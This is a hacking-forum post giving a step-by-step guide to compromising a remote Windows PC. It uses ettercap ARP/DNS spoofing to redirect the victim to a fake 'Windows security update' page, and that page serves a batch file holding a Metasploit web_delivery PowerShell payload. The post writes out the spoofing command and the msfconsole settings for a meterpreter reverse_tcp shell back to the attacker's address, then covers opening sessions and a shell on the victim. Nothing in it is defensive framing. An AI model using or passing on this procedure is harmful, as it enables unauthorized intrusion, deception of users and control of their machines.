• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit

Ainhoooafer

Seinen Specialist
A Rep
0
0
0
Rep
0
A Vouches
0
0
0
Vouches
0
Posts
60
Likes
196
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
First of all, go to Kali Linux Home directory. Move to etc /ettercap directory. Now edit etter.dns File.

1.png


Modify the contents of the etter.dns and add your own pc IP address as A record.

2.png


Now run the following command with victim pc IP address to spoof the victim pc.

ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.103.//

3.png


It will activate dns_spoof plug-in.

4.png


Open terminal and type msfconsole to open metasploit

Now typeuse exploit/multi/script/web_delivery

msf exploit(web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit(web_delivery)>set lport 4444

msf exploit(web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit(web_delivery)>exploit

5.png


Now copy this Powershell.exe code and save as update .bat file.

6.png


Now create a fake website page showing windows security update message. In webpage, give the hyperlink as update.bat file.

7.png


Now save this webpage as index.html and paste it in directory /var /www/html.

8.png


Now start Apache server .write following command. Service Apache2 start.

9.png


When the victim will open any web, this page showing windows security update message will displayed.

When victim will click on download update link & save the batch file. The batch file will execute automatically.

11.png


12.png


Now you will get the control of victim PC. Now type the following command. Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

13.png
 

432,289

312,550

312,559

Top